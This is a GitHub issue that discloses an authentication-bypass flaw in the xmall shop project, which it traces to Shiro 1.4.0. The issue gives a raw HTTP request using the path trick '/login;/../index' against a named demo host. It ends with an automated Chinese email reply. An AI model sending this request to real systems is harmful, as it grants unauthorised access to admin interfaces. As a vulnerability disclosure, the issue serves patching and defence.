xmall icon indicating copy to clipboard operation
xmall copied to clipboard
verified publisher icon Exrick

There is an Incorrect Access Control vulnerability in xmall

Open RacerZ-fighting opened this issue 1 year ago • 1 comments

[Suggested description] xmall was found to have an Incorrect Access Control vulnerability due to the use of an insecure version of Shiro.

[Vulnerability Type] Incorrect access control

[Vendor of Product] https://github.com/Exrick/xmall

[Affected Product Code Base] all version (<= v1.1)

[Affected Component] All interface require authentication

[Attack Type] Remote

[Vulnerability details] Send the payload below to the interface /index

GET /login;/../index HTTP/1.1
Host: xmadmin.exrick.cn
User-Agent: Apifox/1.0.0 (https://apifox.com)
Accept: */*
Host: xmadmin.exrick.cn
Connection: keep-alive
Cookie: JSESSIONID=AFB6620FA06404C85D9C5E285E193F8C
image image

[Cause of vulnerability] Shiro is used for authentication in Xmall, but version 1.4.0 contains an insecure implementation image Meanwhile, xmall includes some interfaces configured without permission requirements, enabling the exploitation of vulnerabilities in Shiro's implementation to achieve authentication bypass. image

RacerZ-fighting avatar Nov 23 '24 07:11 RacerZ-fighting

您的邮件我已收到,祝您工作顺利、生活愉快。

leopoldwalden avatar Nov 23 '24 07:11 leopoldwalden